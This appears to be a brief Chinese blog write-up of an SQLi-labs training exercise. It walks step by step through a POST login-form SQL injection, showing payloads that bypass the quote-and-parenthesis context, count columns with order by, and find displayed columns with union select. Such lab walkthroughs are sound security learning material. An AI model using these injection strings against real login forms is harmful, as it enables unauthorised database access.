phpstudy-sqlilabs-less-1

题目:POST - Error Based - Double quotes- String - with twist

基于错误的双引号post型字符变形的注入

 

先抓下包,拿到格式

uname=1#&passwd=1&submit=Submit

 

根据题目

注入点可能有 " )

 

尝试

uname=1" or 1=1 #&passwd=1&submit=Submit

截图.png

出现报错

 

尝试

uname=1") or 1=1 #&passwd=1&submit=Submit

截图.png

成功

 

查字符段

uname=1") or 1=1 order by 3 #&passwd=1&submit=Submit

 

查可回显字符段

uname=1") and 1=1 union select 1,2,3 #&passwd=1&submit=Submit

 

posted @   我用歌声寻觅你  阅读(9)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示